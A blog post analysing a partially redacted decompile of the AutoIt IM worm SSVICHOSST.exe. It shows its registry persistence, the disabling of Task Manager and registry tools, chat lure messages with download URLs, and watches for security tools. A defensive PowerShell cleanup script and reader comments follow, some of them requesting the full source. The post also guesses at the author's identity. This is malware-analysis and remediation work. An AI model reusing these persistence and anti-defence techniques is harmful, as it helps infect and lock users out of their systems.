Complete detail about SSVICHOSST.exe IM-Worm.Win32.Sohanad.t

File Name : SSVICHOSST.exe
Virus     : IM-Worm.Win32.Sohanad.t
The virus program was written in the AutoIt scripting language, and it has been decompiled with the AutoIt decompiler "Exe2Aut v3".
I don't know whether anyone else has done this or not; here is the decompiled virus program:

*******************
*******************
; <AUT2EXE VERSION: 3.2.2.0>

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-

;Written by Nhatquanglan
;contact nhatquanglan@gmail.com

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-

; Include Version:1.59  (04/20/2006)
; ——————————————————————————
;
; AutoIt Version: 3.0
; Language:       English
; Description:    Functions that assist with process management.
;
; —————————————————————–
;===============================================================================
; Description -   Returns a string containing the process name that belongs to a given PID.
; Syntax -        _ProcessGetName( $iPID )
; Parameters -    $iPID - The PID of a currently running process
; Requirements -  None.
; Return Values - Success - The name of the process
;                 Failure - Blank string and sets @error
;                       1 - Process doesn't exist
;                       2 - Error getting process list
;                       3 - No processes found
; Author(s) -     Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes -         Supplementary to ProcessExists().
;===============================================================================

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

;===============================================================================
; Function Name:    _ProcessGetPriority()
; Description:      Get the priority of an open process
; Parameter(s):     $vProcess      - PID or name of a process.
; Requirement(s):   AutoIt Beta v3.1.1.61+
;                   kernel32.dll (included with Windows)
; Return Value(s):  On Success - Returns integer corresponding to
;                   the process's priority:
;                     0 - Idle/Low
;                     1 - Below Normal (Not supported on Windows 95/98/ME)
;                     2 - Normal
;                     3 - Above Normal (Not supported on Windows 95/98/ME)
;                     4 - High
;                     5 - Realtime
; On Failure:       Returns -1 and sets @Error to 1
; Author(s):        Matthew Tucker
;                   Valik added Pid or Processname logic
;===============================================================================

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxx
;===============================================================================
; Description:      Executes a DOS command in a hidden command window.
; Syntax:           _RunDOS( $sCommand )
; Parameter(s):     $sCommand - Command to execute
; Requirement(s):   None
; Return Value(s):  On Success - Returns the exit code of the command
;                   On Failure - Depends on RunErrorsFatal setting
; Author(s):        Jeremy Landes <jlandes at landeserve dot com>
; Note(s):          None
;
;===============================================================================

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-
#NoTrayIcon
$name = "SSVICHOSST"
$setting = "setting"
$ini = ".ini"
$nql = ".nql"
$xls = ".xls"
$exe = ".exe"
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxxx

; Persistence: appends the worm to the Winlogon shell (runs for every user at logon)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & $name & $exe)
; Persistence: per-user Run entry disguised as Yahoo Messenger (note the misspelling)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yahoo Messengger", "REG_SZ", @SystemDir & "\" & $name & $exe)
; Hides Folder Options, Task Manager and the registry editors from the user
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxx

Func downloadurl()
 $settingurl = "http://nhatquanglan3.t35.com

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

 $downloaded = "success"
 $settingurl1 = "http://nhatquanglan4.t35.com

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

 $myweb = "http://nhatquanglan1.0catch.com

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxx

  $tin[1] = "Vao day nghe bai nay di ban " & $myweb & " "
 EndIf
 ; Each lure text is read from setting.ini in the system directory and falls back
 ; to a hard-coded Vietnamese message that points at $myweb
 $tin[2] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[2]", "")
 If $tin[2] = "" Then
  $tin[2] = "Vao day nghe bai nay di ban " & $myweb & " "
 EndIf
 $tin[3] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[3]", "")
 If $tin[3] = "" Then
  $tin[3] = "Biet tin gi chua, vao day coi di " & $myweb & " "
 EndIf
 $tin[4] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[4]", "")
 If $tin[4] = "" Then
  $tin[4] = "Trang Web nay coi cung hay, vao coi thu di " & $myweb & " "
 EndIf
 $tin[5] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[5]", "")
 If $tin[5] = "" Then
  $tin[5] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?  " & $myweb & "  "
 EndIf
 $tin[6] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[6]", "")
 If $tin[6] = "" Then
  $tin[6] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $myweb & " "
 EndIf
 $tin[7] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[7]", "")
 If $tin[7] = "" Then
  $tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $myweb & " "
 EndIf
 $tin[8] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[8]", "")
 If $tin[8] = "" Then
  $tin[8] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $myweb & " "
 EndIf
 $tin[9] = IniRead(@SystemDir & "\" & $setting & $ini, "setting", "tin[9]", "")
 If $tin[9] = "" Then
  $tin[9] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $myweb & " "
 EndIf
 $tieude = WinGetTitle("Yahoo! Messenger", "")

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

 ; The worm watches for the windows of tools that could be used against it (the Bkav2006
 ; antivirus, msconfig's "System Configuration", the registry editor, Task Manager) and
 ; for a running cmd.exe; what it does when it finds them is in the redacted parts below
 If WinExists("Bkav2006") Then

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

 If WinExists("System Configuration") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxxx
 If WinExists("Registry") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxxx
 If WinExists("Windows Task") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxxxxxx
 If WinExists("[FireLion]") Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx
 If ProcessExists("cmd.exe") Then

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $i)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxxx

("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxx

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasons xxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-
*******************
*******************
OBSERVATIONS:
————-

Here you can clearly see:

#; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
>"phuong anh" is the Windows user name in the build path, so it is probably the name of the virus writer.

#;Written by Nhatquanglan
>Probably his nickname, or something else.

#;contact nhatquanglan@gmail.com
>His email address, though of course you can't be sure of that.

#"http://nhatquanglan3.t35.com
#"http://nhatquanglan4.t35.com
#"http://nhatquanglan1.0catch.com
>His websites.
#
E may, vao day coi co con nho nay ngon lam
Vao day nghe bai nay di ban
Vao day nghe bai nay di ban
Biet tin gi chua, vao day coi di
Trang Web nay coi cung hay, vao coi thu di
Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?
Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa…
Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi…
Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo…
Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon…
>The strings in the program (the lure messages it sends over chat).

#Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?
#Biet tin gi chua, vao day coi di
>These match the spam messages that the Nhatquanglan virus, with its many variants like SCVHSOT.exe, scvshosts.exe and SCVVHSOT.exe, posts in chat software.
This means that the Nhatquanglan virus and its many variants were most probably written by the same person.
But the newer virus files can't be decompiled, because he now protects the AutoIt program with the compiler's "Passphrase" option. Clever... Unless you have the passphrase, you can't decompile them.
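The registry writes visible in the decompiled main body (the Winlogon Shell, the fake "Yahoo Messengger" Run entry, the Explorer and System policy values, AtTaskMaxHours) and the two files it keeps in @SystemDir can be audited from the defender's side with the following PowerShell. This is an added example, not code from the worm or from piyushlabs' heal tool; it assumes the values exactly as they appear in the decompile, and the function name Test-SohanadArtifacts is my own.

```powershell
# Added example (not from the decompiled worm or piyushlabs' heal tool): audits the
# registry values and files that the decompiled main body writes, and optionally
# undoes the ones whose clean default is certain. Run in the affected user's
# session (HKCU values); the HKLM checks need administrative rights.
$SysDir = [Environment]::GetFolderPath('System')              # the worm's @SystemDir
$Files  = "$SysDir\SSVICHOSST.exe", "$SysDir\setting.ini"     # $name & $exe, $setting & $ini

# Path, value name, a predicate that flags the worm's value, and the fix to apply
# ($null where the clean default is not known; such values are only reported).
$Checks = @(
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'; Name = 'Shell'
       Bad = { param($v) $v -ne 'Explorer.exe' }     # worm appends " SSVICHOSST.exe"
       Fix = { param($p, $n) Set-ItemProperty -Path $p -Name $n -Value 'Explorer.exe' } },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'; Name = 'Yahoo Messengger'  # sic
       Bad = { param($v) $true }                      # the entry should not exist at all
       Fix = { param($p, $n) Remove-ItemProperty -Path $p -Name $n } },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NofolderOptions'
       Bad = { param($v) $v -ne 0 }
       Fix = { param($p, $n) Remove-ItemProperty -Path $p -Name $n } },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'DisableTaskMgr'
       Bad = { param($v) $v -ne 0 }
       Fix = { param($p, $n) Remove-ItemProperty -Path $p -Name $n } },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'DisableRegistryTools'
       Bad = { param($v) $v -ne 0 }
       Fix = { param($p, $n) Remove-ItemProperty -Path $p -Name $n } },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\Schedule'; Name = 'AtTaskMaxHours'
       Bad = { param($v) $v -eq 0 }                   # worm sets 0; restoring is left to the admin
       Fix = $null }
)

function Test-SohanadArtifacts {
    param([switch]$Remediate)   # without -Remediate the function only reports
    foreach ($f in $Files) {
        if (Test-Path -LiteralPath $f) {
            [pscustomobject]@{ Kind = 'File'; Location = $f; Value = (Get-Item -LiteralPath $f).Length; Fixed = $false }
        }
    }
    foreach ($c in $Checks) {
        $item = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { continue }             # value absent: nothing to flag
        $v = $item.($c.Name)
        if (-not (& $c.Bad $v)) { continue }
        $fixed = $false
        if ($Remediate -and $c.Fix) { & $c.Fix $c.Path $c.Name; $fixed = $true }
        [pscustomobject]@{ Kind = 'Registry'; Location = "$($c.Path)\$($c.Name)"; Value = $v; Fixed = $fixed }
    }
}

Test-SohanadArtifacts | Format-Table -AutoSize   # add -Remediate once the worm process and file are gone
```

Remediating the registry before the running process and the file in System32 are removed is pointless, since the main body rewrites these values on every run.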

17 Responses to “Complete detail about SSVICHOSST.exe IM-Worm.Win32.Sohanad.t”

  1. Gurpreet Says:

    suffering from this virus, can you help

  2. venkatmani Says:

    my system is affected by the ssvichosst.exe virus. i am using win98 os

  3. piyushlabs Says:

    GURPREET
    VENKATMANI
    visit this page for the manual solution
    https://piyushlabs.wordpress.com/ssvichosst/

    and u download and run the heal from here
    https://piyushlabs.wordpress.com/downloads/

  4. gurjeet Says:

    it not only spams chatting software… but i got a version which spams the command lines of many of my programs like auto cad, 3ds max and causes photoshop to shut down….. is it a new manifestation?

  5. piyushlabs Says:

    GURJEET
    yup, may be a new nhatquanglan variant,
    n they can affect any program.
    can u mail me that particular virus (exe file),
    if u can get it..

  6. vicky Says:

    hi…am vicky.my system was affected with
    ssvichosst.exe and i was using avg anti spyware
    the virus was detected & deleted but still my system booting is slow and a search result of not finding
    the file always appearing everytime i switch on
    the system….does deletion of file made any
    trouble?plz help….

  7. piyushlabs Says:

    vicky
    how does the error look like can u send me the screenshot.
    try m heal for ssvichosst.

  8. Vilas Unawane Says:

    My system is already affected by it.Need simple
    downloadable solution.Tried Trend micro scan lp$vpn163 but

  9. mark Says:

    Bro can you send me the whole decrypted virus. I have that virus but its upgraded version i think so decompile without the passphrase will not work.

  10. Sheahad Says:

    Thank you for the help.

  11. ken Says:

    thank you very much ….ur download worked for me
    thank you ….I would be glad if u could find a solution against a virus named blok.exe and trojan named …planet[1] planet[2] and so on …many times they travel in cognizance with ssvichosst.exe

  12. mario Says:

    hey if you can email me the passphrase to decompile the virus .

    im studying programming plz help me.
    i like this virus script plz accept my favour.

    OR if you can email me the .au3 script plz

  13. Vikram Madan Says:

    Hi Piyush.

    My PC has a new variant of this ssvichosst. Your downloadable solution is not working on this one.

    What to do? If you tell me what file to send you, I will mail it to you.

    Thanks.

  14. JONATHAN Says:

    Sir
    I would like to learn how to program that virus and the solution to it

  15. CrisP Says:

    Hi,

    Can you tell us how to get the code out of an AutoIt 3 program? Can you unpack other packed files that use Version 3.2.2.0? Thanks!

  16. Jasmine Says:

    Hi, when I start up the laptop, I get a tab which is named vse432 Properties. And then there’s a cycle of non-stop Windows Explorer Has Stopped working error…and everything else errors as well with the messages.

    I was wondering if this is the virus infecting the system? I tried to run the patch but it’s not working…I suspect the step which is not working is when I double click on the shortcut.

    Can you please advise? :\

  17. quesss...woy Says:

    wow…very nice, we can easily solve this problem..i like this
